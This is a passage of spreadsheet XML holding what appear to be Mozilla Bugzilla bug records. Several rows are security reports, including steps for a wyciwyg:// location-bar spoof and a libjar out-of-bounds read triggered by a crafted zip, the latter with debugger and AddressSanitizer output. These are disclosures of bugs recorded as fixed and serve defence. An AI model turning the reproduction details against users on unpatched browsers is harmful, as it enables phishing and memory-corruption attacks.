      <c r="U882" t="n">
        <v>0</v>
      </c>
      <c r="V882" t="n">
        <v>26</v>
      </c>
      <c r="W882" t="inlineStr">
        <is>
          <t>Created attachment 8640743
TESTCASE1.html
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0
Build ID: 20150630154324
Steps to reproduce:
When you are on a malicious webpage which contains a link like : 
wyciwyg://https://www.google.com/  , 
copy this link and make a right click into the location bar and click on the selection :"Past and Go" 
All these steps lead to a Location Bar Spoofing Vulnerbility 
Steps with the testcase :
-1 : copy the URL into the link in the testcase webpage, make a right click into the location bar and click "Past and Go".
-2 : after all these steps , Location Bar is Spoofed.
Actual results:
With the wyciwyg:// protocol it's possible to spoof the location bar by a simple interraction like drag and drop a link into the location bar or copy the link URL and try to go on this URL by a right click into the location bar and a click on "Past and Go".
Expected results:
With the wyciwyg:// protocol it's possible to spoof the location.
code a patch of the "past and go" of an url with the protocol wyciwyg:// don't change the URL of the original webpage can be a possible idea to resolve this vulnerbility.</t>
        </is>
      </c>
      <c r="X882" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="883">
      <c r="A883" t="n">
        <v>414002</v>
      </c>
      <c r="B883" t="inlineStr">
        <is>
          <t>2008-01-25 09:04:56 -0800</t>
        </is>
      </c>
      <c r="C883" t="inlineStr">
        <is>
          <t>Temporary files for uploaded attachments are not deleted on Windows</t>
        </is>
      </c>
      <c r="D883" t="inlineStr">
        <is>
          <t>2012-03-25 18:59:26 -0700</t>
        </is>
      </c>
      <c r="E883" t="n">
        <v>1</v>
      </c>
      <c r="F883" t="n">
        <v>1</v>
      </c>
      <c r="G883" t="n">
        <v>4</v>
      </c>
      <c r="H883" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I883" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J883" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K883" t="inlineStr">
        <is>
          <t>3.0.3</t>
        </is>
      </c>
      <c r="L883" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M883" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N883" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O883" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P883" t="inlineStr"/>
      <c r="Q883" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R883" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S883" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T883" t="n">
        <v>1</v>
      </c>
      <c r="U883" t="n">
        <v>0</v>
      </c>
      <c r="V883" t="n">
        <v>14</v>
      </c>
      <c r="W883" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Build Identifier: 3.0.3
After uploading an attachment, I find that a CGItempXXXXX file is left behind in the temporary files directory.
I notice that Bugzilla/CGI.pm uses the :private_tempfiles feature of CGI.pm, but this doesn't work on Windows because you cannot delete an open file on Windows (unless you start using some low-level Win32API::File trickery. Therefore, it is the CGI::DESTROY() method that normally deletes the temporary files for uploads on Windows, but this never gets called by Bugzilla::CGI. It has its own DESTROY() method which does nothing.
This is probably a hang-over from the past when CGI::DESTROY() itself was empty, but now that CGI::DESTROY() does something useful Bugzilla::CGI::DESTROY() needs to call it. (The deletion of temporary files in CGI::DESTROY() was added in CGI.pm version 3.01, from a patch by me.)
Reproducible: Always
Steps to Reproduce:
1. Add an attachment to a bug in a Bugzilla system running on Windows.
2. Look in the temporary files directory (probably the folder specified by the TEMP or TMP environment variables, or else something like C:\WINDOWS\TEMP--see the BEGIN {} block in Bugzilla::CGI).
Actual Results:  
You'll find a CGItempXXXXX file has been left behind in that directory.
Expected Results:  
These temporary files should be deleted after the upload is done.
The following patch to Bugzilla/CGI.pm fixes it (as long as you're using CGI.pm $VERSION &gt;= 3.01).
--- CGI.pm.orig	2008-01-25 16:42:13.904661500 +0000
+++ CGI.pm	2008-01-25 16:42:18.389180000 +0000
@@ -54,7 +54,7 @@
 # We need to do so, too, otherwise perl dies when the object is destroyed
 # and we don't have a DESTROY method (because CGI.pm's AUTOLOAD will |die|
 # on getting an unknown sub to try to call)
-sub DESTROY {};
+sub DESTROY { shift-&gt;SUPER::DESTROY(@_); };
 sub new {
     my ($invocant, @args) = @_;
End of Patch.</t>
        </is>
      </c>
      <c r="X883" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="884">
      <c r="A884" t="n">
        <v>1527608</v>
      </c>
      <c r="B884" t="inlineStr">
        <is>
          <t>2019-02-13 06:08:45 -0800</t>
        </is>
      </c>
      <c r="C884" t="inlineStr">
        <is>
          <t>antenna deploy: 27</t>
        </is>
      </c>
      <c r="D884" t="inlineStr">
        <is>
          <t>2019-02-13 12:09:00 -0800</t>
        </is>
      </c>
      <c r="E884" t="n">
        <v>1</v>
      </c>
      <c r="F884" t="n">
        <v>1</v>
      </c>
      <c r="G884" t="n">
        <v>4</v>
      </c>
      <c r="H884" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I884" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J884" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K884" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L884" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M884" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N884" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O884" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P884" t="inlineStr"/>
      <c r="Q884" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R884" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S884" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T884" t="n">
        <v>1</v>
      </c>
      <c r="U884" t="n">
        <v>0</v>
      </c>
      <c r="V884" t="n">
        <v>2</v>
      </c>
      <c r="W884" t="inlineStr">
        <is>
          <t>We want to do a antenna -prod deploy today tagged 27.
It consists of the following:
(current tag: 26 - `dff06e9`)
`9cf9174`: fix bug 1357246: remove de-nulling code (willkg)
(next tag: 27 - `e6142c2`)</t>
        </is>
      </c>
      <c r="X884" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="885">
      <c r="A885" t="n">
        <v>879360</v>
      </c>
      <c r="B885" t="inlineStr">
        <is>
          <t>2013-06-04 10:40:50 -0700</t>
        </is>
      </c>
      <c r="C885" t="inlineStr">
        <is>
          <t>Create a whitelist for webpay</t>
        </is>
      </c>
      <c r="D885" t="inlineStr">
        <is>
          <t>2013-06-17 11:27:15 -0700</t>
        </is>
      </c>
      <c r="E885" t="n">
        <v>1</v>
      </c>
      <c r="F885" t="n">
        <v>1</v>
      </c>
      <c r="G885" t="n">
        <v>6</v>
      </c>
      <c r="H885" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I885" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J885" t="inlineStr">
        <is>
          <t>Payments/Refunds</t>
        </is>
      </c>
      <c r="K885" t="inlineStr">
        <is>
          <t>1.5</t>
        </is>
      </c>
      <c r="L885" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M885" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N885" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O885" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P885" t="inlineStr"/>
      <c r="Q885" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R885" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S885" t="inlineStr">
        <is>
          <t>2013-06-06</t>
        </is>
      </c>
      <c r="T885" t="n">
        <v>1</v>
      </c>
      <c r="U885" t="n">
        <v>0</v>
      </c>
      <c r="V885" t="n">
        <v>5</v>
      </c>
      <c r="W885" t="inlineStr">
        <is>
          <t>Allow webpay to accept a list of accounts, so that we can turn on payments in production for a limited number of users.
Lets use for stage too.
Wildcards would be nice.</t>
        </is>
      </c>
      <c r="X885" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="886">
      <c r="A886" t="n">
        <v>1512511</v>
      </c>
      <c r="B886" t="inlineStr">
        <is>
          <t>2018-12-06 12:06:03 -0800</t>
        </is>
      </c>
      <c r="C886" t="inlineStr">
        <is>
          <t>Remove input.mozilla.org from browser/app/permissions</t>
        </is>
      </c>
      <c r="D886" t="inlineStr">
        <is>
          <t>2019-10-24 12:56:57 -0700</t>
        </is>
      </c>
      <c r="E886" t="n">
        <v>1</v>
      </c>
      <c r="F886" t="n">
        <v>1</v>
      </c>
      <c r="G886" t="n">
        <v>2</v>
      </c>
      <c r="H886" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I886" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J886" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K886" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L886" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M886" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N886" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O886" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P886" t="inlineStr">
        <is>
          <t>[adv-main68+]</t>
        </is>
      </c>
      <c r="Q886" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R886" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S886" t="inlineStr">
        <is>
          <t>Firefox 68</t>
        </is>
      </c>
      <c r="T886" t="n">
        <v>1</v>
      </c>
      <c r="U886" t="n">
        <v>0</v>
      </c>
      <c r="V886" t="n">
        <v>10</v>
      </c>
      <c r="W886" t="inlineStr">
        <is>
          <t>browser/app/permissions gives extra permission "remote-troubleshooting" to input.mozilla.org, which is now redirecting to qsurvey.
We probably do not want to give extra permission to input.m.o.</t>
        </is>
      </c>
      <c r="X886" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="887">
      <c r="A887" t="n">
        <v>1364581</v>
      </c>
      <c r="B887" t="inlineStr">
        <is>
          <t>2017-05-12 14:31:54 -0700</t>
        </is>
      </c>
      <c r="C887" t="inlineStr">
        <is>
          <t>Search Suggestion UI updates for Photon</t>
        </is>
      </c>
      <c r="D887" t="inlineStr">
        <is>
          <t>2017-09-28 15:46:00 -0700</t>
        </is>
      </c>
      <c r="E887" t="n">
        <v>1</v>
      </c>
      <c r="F887" t="n">
        <v>1</v>
      </c>
      <c r="G887" t="n">
        <v>2</v>
      </c>
      <c r="H887" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I887" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J887" t="inlineStr">
        <is>
          <t>Browser</t>
        </is>
      </c>
      <c r="K887" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L887" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M887" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N887" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O887" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P887" t="inlineStr">
        <is>
          <t>[MobileCore][Photon]</t>
        </is>
      </c>
      <c r="Q887" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R887" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S887" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T887" t="n">
        <v>1</v>
      </c>
      <c r="U887" t="n">
        <v>0</v>
      </c>
      <c r="V887" t="n">
        <v>6</v>
      </c>
      <c r="W887" t="inlineStr">
        <is>
          <t>This bug will track changes related to search suggestions
- New transparent SearchViewController
- Updated colors / icons for search suggestion UI</t>
        </is>
      </c>
      <c r="X887" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="888">
      <c r="A888" t="n">
        <v>479413</v>
      </c>
      <c r="B888" t="inlineStr">
        <is>
          <t>2009-02-20 04:15:26 -0800</t>
        </is>
      </c>
      <c r="C888" t="inlineStr">
        <is>
          <t>SSL spoofing using IDN characters that appear like spaces on Windows (invisible)</t>
        </is>
      </c>
      <c r="D888" t="inlineStr">
        <is>
          <t>2009-06-11 15:18:30 -0700</t>
        </is>
      </c>
      <c r="E888" t="n">
        <v>1</v>
      </c>
      <c r="F888" t="n">
        <v>1</v>
      </c>
      <c r="G888" t="n">
        <v>3</v>
      </c>
      <c r="H888" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I888" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J888" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K888" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L888" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M888" t="inlineStr">
        <is>
          <t>Windows Vista</t>
        </is>
      </c>
      <c r="N888" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O888" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P888" t="inlineStr">
        <is>
          <t>[sg:moderate spoof]</t>
        </is>
      </c>
      <c r="Q888" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R888" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S888" t="inlineStr">
        <is>
          <t>mozilla1.9.1</t>
        </is>
      </c>
      <c r="T888" t="n">
        <v>1</v>
      </c>
      <c r="U888" t="n">
        <v>0</v>
      </c>
      <c r="V888" t="n">
        <v>35</v>
      </c>
      <c r="W888" t="inlineStr">
        <is>
          <t>All important is described on URL: http://tinyurl.com/am8gjy</t>
        </is>
      </c>
      <c r="X888" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="889">
      <c r="A889" t="n">
        <v>407110</v>
      </c>
      <c r="B889" t="inlineStr">
        <is>
          <t>2007-12-05 21:04:36 -0800</t>
        </is>
      </c>
      <c r="C889" t="inlineStr">
        <is>
          <t>sessionstore should use native json to serialize session data</t>
        </is>
      </c>
      <c r="D889" t="inlineStr">
        <is>
          <t>2011-09-26 13:21:34 -0700</t>
        </is>
      </c>
      <c r="E889" t="n">
        <v>1</v>
      </c>
      <c r="F889" t="n">
        <v>1</v>
      </c>
      <c r="G889" t="n">
        <v>2</v>
      </c>
      <c r="H889" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I889" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J889" t="inlineStr">
        <is>
          <t>Session Restore</t>
        </is>
      </c>
      <c r="K889" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L889" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M889" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N889" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O889" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P889" t="inlineStr"/>
      <c r="Q889" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R889" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S889" t="inlineStr">
        <is>
          <t>Firefox 3.1b2</t>
        </is>
      </c>
      <c r="T889" t="n">
        <v>1</v>
      </c>
      <c r="U889" t="n">
        <v>1</v>
      </c>
      <c r="V889" t="n">
        <v>24</v>
      </c>
      <c r="W889" t="inlineStr">
        <is>
          <t>We can get better performance at startup and likely Tp by using the new native json functionality, once it's landed.</t>
        </is>
      </c>
      <c r="X889" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="890">
      <c r="A890" t="n">
        <v>866891</v>
      </c>
      <c r="B890" t="inlineStr">
        <is>
          <t>2013-04-29 13:13:41 -0700</t>
        </is>
      </c>
      <c r="C890" t="inlineStr">
        <is>
          <t>Remove or replace the Aggregate Helpfulness Chart</t>
        </is>
      </c>
      <c r="D890" t="inlineStr">
        <is>
          <t>2013-05-15 13:40:29 -0700</t>
        </is>
      </c>
      <c r="E890" t="n">
        <v>1</v>
      </c>
      <c r="F890" t="n">
        <v>1</v>
      </c>
      <c r="G890" t="n">
        <v>5</v>
      </c>
      <c r="H890" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I890" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J890" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K890" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L890" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M890" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N890" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O890" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P890" t="inlineStr">
        <is>
          <t>u=contributor c=wiki p=1 s=2013.10</t>
        </is>
      </c>
      <c r="Q890" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R890" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S890" t="inlineStr">
        <is>
          <t>2013Q2</t>
        </is>
      </c>
      <c r="T890" t="n">
        <v>1</v>
      </c>
      <c r="U890" t="n">
        <v>0</v>
      </c>
      <c r="V890" t="n">
        <v>10</v>
      </c>
      <c r="W890" t="inlineStr">
        <is>
          <t>Opening this bug to discuss the removal of the Aggregate Helpfulness Chart on the KB dashboard.
The chart is at the bottom of this page:
https://support.mozilla.org/en-US/contributors
Click "Show Aggregate Helpfulness Chart".
Screenshot: http://cl.ly/image/330A1c1K0j2Y
It tries to show which articles had significant helpfulness changes in the past month. Or something like that. Bug 663244 was the bug for that.</t>
        </is>
      </c>
      <c r="X890" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="891">
      <c r="A891" t="n">
        <v>1211262</v>
      </c>
      <c r="B891" t="inlineStr">
        <is>
          <t>2015-10-04 07:25:14 -0700</t>
        </is>
      </c>
      <c r="C891" t="inlineStr">
        <is>
          <t>Arbitrary memory access in libjar (libxul)</t>
        </is>
      </c>
      <c r="D891" t="inlineStr">
        <is>
          <t>2024-05-30 09:06:07 -0700</t>
        </is>
      </c>
      <c r="E891" t="n">
        <v>1</v>
      </c>
      <c r="F891" t="n">
        <v>1</v>
      </c>
      <c r="G891" t="n">
        <v>3</v>
      </c>
      <c r="H891" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I891" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J891" t="inlineStr">
        <is>
          <t>Networking: JAR</t>
        </is>
      </c>
      <c r="K891" t="inlineStr">
        <is>
          <t>41 Branch</t>
        </is>
      </c>
      <c r="L891" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M891" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N891" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O891" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P891" t="inlineStr">
        <is>
          <t>[adv-main42+][adv-esr38.4+]</t>
        </is>
      </c>
      <c r="Q891" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R891" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S891" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T891" t="n">
        <v>1</v>
      </c>
      <c r="U891" t="n">
        <v>0</v>
      </c>
      <c r="V891" t="n">
        <v>40</v>
      </c>
      <c r="W891" t="inlineStr">
        <is>
          <t>Created attachment 8669427
test.xpi
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0
Build ID: 20150918100310
Steps to reproduce:
An arbitrary memory access was found in libjar using a specially crafted zip. It was tested in the libjar code shipped in Firefox 41 as well as Firefox 44.0a1. To reproduce this issue, find attached a test case (causing reading outside the buffers bounds in heap or stack randomly) and a JavaScript file to trigger this vulnerability in xpcshell (available in the xulrunner-sdk).
This particular xpi file is rejected by Firefox if you try to install them as extension, but we believe it could be modified to have a valid install.rdf file and cause the crash in parsing of an extension to install. At this point, i think it is quite important to know if this issue can be easily exploited remotely without user intervention.
Actual results:
The report of a debugger (x86) is available here:
$ LD_LIBRARY_PATH=".:./plugins:." gdb --args ./xpcshell test_open_xpi.js $(pwd)/test.xpi
Program received signal SIGSEGV, Segmentation fault.
0xb4429161 in nsJARInputStream::Read(char*, unsigned int, unsigned int*) () from ./libxul.so
(gdb) bt
#0  0xb4429161 in nsJARInputStream::Read(char*, unsigned int, unsigned int*) () from ./libxul.so
#1  0xb3fb3cca in nsScriptableInputStream::ReadHelper(char*, unsigned int) () from ./libxul.so
#2  0xb3fb3dee in nsScriptableInputStream::Read(unsigned int, char**) () from ./libxul.so
#3  0xb3fcf790 in NS_InvokeByIndex () from ./libxul.so
#4  0xb440bab9 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) () from ./libxul.so
#5  0xb440ea7d in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) () from ./libxul.so
#6  0xb5dfec24 in js::Invoke(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) () from ./libxul.so
#7  0xb5dfa298 in Interpret(JSContext*, js::RunState&amp;) () from ./libxul.so
#8  0xb5dfe675 in js::RunScript(JSContext*, js::RunState&amp;) () from ./libxul.so
#9  0xb5dfe83a in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, JS::Value const&amp;, js::ExecuteType, js::AbstractFramePtr, JS::Value*) () from ./libxul.so
#10 0xb5dfe9b1 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) () from ./libxul.so
#11 0xb613e318 in ExecuteScript(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::Value*) () from ./libxul.so
#12 0xb613e691 in JS_ExecuteScript(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::MutableHandle&lt;JS::Value&gt;) () from ./libxul.so
#13 0xb4404ebb in ProcessFile(mozilla::dom::AutoJSAPI&amp;, char const*, _IO_FILE*, bool) () from ./libxul.so
#14 0xb440529f in Process(mozilla::dom::AutoJSAPI&amp;, char const*, bool) () from ./libxul.so
#15 0xb440899b in XRE_XPCShellMain () from ./libxul.so
#16 0x0804c42d in main (argc=4, argv=0xbffffb24, envp=0xbffffb38)
    at /builds/slave/m-cen-lx-000000000000000000000/build/src/js/xpconnect/shell/xpcshell.cpp:54
(gdb) x/i $eip
=&gt; 0xb4429161 &lt;_ZN16nsJARInputStream4ReadEPcjPj+187&gt;:	rep movsb %ds:(%esi),%es:(%edi)
(gdb) info registers 
eax            0x2000004	33554436
ecx            0x1fde028	33415208
edx            0xaced5200	-1393733120
ebx            0xb7e4928c	-1209757044
esp            0xbfffdc00	0xbfffdc00
ebp            0xbfffdc18	0xbfffdc18
esi            0xafa9a000	-1347837952
edi            0xa6821fdc	-1501421604
eip            0xb4429161	0xb4429161 &lt;nsJARInputStream::Read(char*, unsigned int, unsigned int*)+187&gt;
eflags         0x210286	[ PF SF IF RF ID ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
and the report of Address Sanitizer (x86_64) is here:
==8811==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f3cd3729000 at pc 0x460117 bp 0x7fff821757d0 sp 0x7fff82174f90
READ of size 33554436 at 0x7f3cd3729000 thread T0
    #0 0x460116 (/home/g/Apps/firefox-asan/firefox/xpcshell+0x460116)
    #1 0x7f3ce83a646d (libxul.so+0x333a46d)
    #2 0x7f3ce71a657e (libxul.so+0x213a57e)
    #3 0x7f3ce71a6381 (libxul.so+0x213a381)
    #4 0x7f3ce721a704 (libxul.so+0x21ae704)
    #5 0x7f3ce8328571 (libxul.so+0x32bc571)
    #6 0x7f3ce8327f7f (libxul.so+0x32bbf7f)
    #7 0x7f3ce832be9b (libxul.so+0x32bfe9b)
    #8 0x7f3cee569ad2 (libxul.so+0x94fdad2)
    #9 0x7f3cee56904c (libxul.so+0x94fd04c)
    #10 0x7f3cee55b0e9 (libxul.so+0x94ef0e9)
    #11 0x7f3cee548e50 (libxul.so+0x94dce50)
    #12 0x7f3cee56bbb2 (libxul.so+0x94ffbb2)
    #13 0x7f3cee56c83d (libxul.so+0x950083d)
    #14 0x7f3ceee6a06c (libxul.so+0x9dfe06c)
    #15 0x7f3ceee69e04 (libxul.so+0x9dfde04)
    #16 0x7f3ce8366b74 (libxul.so+0x32fab74)
    #17 0x7f3ce8366e13 (libxul.so+0x32fae13)
    #18 0x7f3ce830792f (libxul.so+0x329b92f)
    #19 0x7f3ce8305049 (libxul.so+0x3299049)
    #20 0x48a94f (/home/g/Apps/firefox-asan/firefox/xpcshell+0x48a94f)
    #21 0x7f3ce19c9ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #22 0x48a6cc (/home/g/Apps/firefox-asan/firefox/xpcshell+0x48a6cc)
0x7f3cd3729000 is located 6144 bytes to the left of 167422-byte region [0x7f3cd372a800,0x7f3cd37535fe)
freed by thread T0 here:
    #0 0x472ae1 (/home/g/Apps/firefox-asan/firefox/xpcshell+0x472ae1)
    #1 0x7f3cee193c30 (libxul.so+0x9127c30)
    #2 0x7f3cee66e9d3 (libxul.so+0x96029d3)
    #3 0x7f3ceee42a88 (libxul.so+0x9dd6a88)
    #4 0x7f3ce82b34c0 (libxul.so+0x32474c0)
    #5 0x7f3ce83445b3 (libxul.so+0x32d85b3)
    #6 0x7f3ce82d9958 (libxul.so+0x326d958)
    #7 0x7f3cec4750b4 (libxul.so+0x74090b4)
    #8 0x7f3ce71c5c8c (libxul.so+0x2159c8c)
    #9 0x7f3ce71c6bdd (libxul.so+0x215abdd)
    #10 0x7f3ce71c7a81 (libxul.so+0x215ba81)
    #11 0x7f3ce71c1226 (libxul.so+0x2155226)
    #12 0x7f3ce72690c4 (libxul.so+0x21fd0c4)
    #13 0x7f3ce724e0a4 (libxul.so+0x21e20a4)
    #14 0x7f3ce7240ae9 (libxul.so+0x21d4ae9)
    #15 0x7f3ce8304514 (libxul.so+0x3298514)
    #16 0x48a94f (/home/g/Apps/firefox-asan/firefox/xpcshell+0x48a94f)
    #17 0x7f3ce19c9ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
previously allocated by thread T0 here:
    #0 0x472ce1 (/home/g/Apps/firefox-asan/firefox/xpcshell+0x472ce1)
    #1 0x7f3cee0b8d47 (libxul.so+0x904cd47)
    #2 0x7f3cee0b5d75 (libxul.so+0x9049d75)
    #3 0x7f3cee66e8bd (libxul.so+0x96028bd)
    #4 0x7f3ceee42a88 (libxul.so+0x9dd6a88)
    #5 0x7f3ce82b34c0 (libxul.so+0x32474c0)
    #6 0x7f3ce83445b3 (libxul.so+0x32d85b3)
    #7 0x7f3ce82d9958 (libxul.so+0x326d958)
    #8 0x7f3cec4750b4 (libxul.so+0x74090b4)
    #9 0x7f3ce71c5c8c (libxul.so+0x2159c8c)
    #10 0x7f3ce71c6bdd (libxul.so+0x215abdd)
    #11 0x7f3ce71c7a81 (libxul.so+0x215ba81)
    #12 0x7f3ce71c1226 (libxul.so+0x2155226)
    #13 0x7f3ce72690c4 (libxul.so+0x21fd0c4)
    #14 0x7f3ce724e0a4 (libxul.so+0x21e20a4)
    #15 0x7f3ce7240ae9 (libxul.so+0x21d4ae9)
    #16 0x7f3ce8304514 (libxul.so+0x3298514)
    #17 0x48a94f (/home/g/Apps/firefox-asan/firefox/xpcshell+0x48a94f)
    #18 0x7f3ce19c9ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
  0x0fe81a6dd1b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe81a6dd1c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe81a6dd1d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe81a6dd1e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe81a6dd1f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
